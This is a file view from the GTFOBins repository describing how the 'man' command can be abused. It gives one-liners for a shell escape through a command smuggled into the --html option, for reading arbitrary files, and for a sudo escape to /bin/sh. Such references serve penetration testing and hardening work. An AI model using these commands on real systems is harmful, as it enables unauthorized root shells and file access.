Files
GTFOBins.github.io/_gtfobins/man.md
nightshiba a3b63dae9e Improved man.md shell function
Replaced a command requiring interactive actions with a one-liner
2021-02-27 12:39:48 +01:00

307 B

description, functions
description functions
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
shell file-read sudo
code
man --html='$(sh > /dev/tty)' sh
code
man file_to_read
code
sudo man man !/bin/sh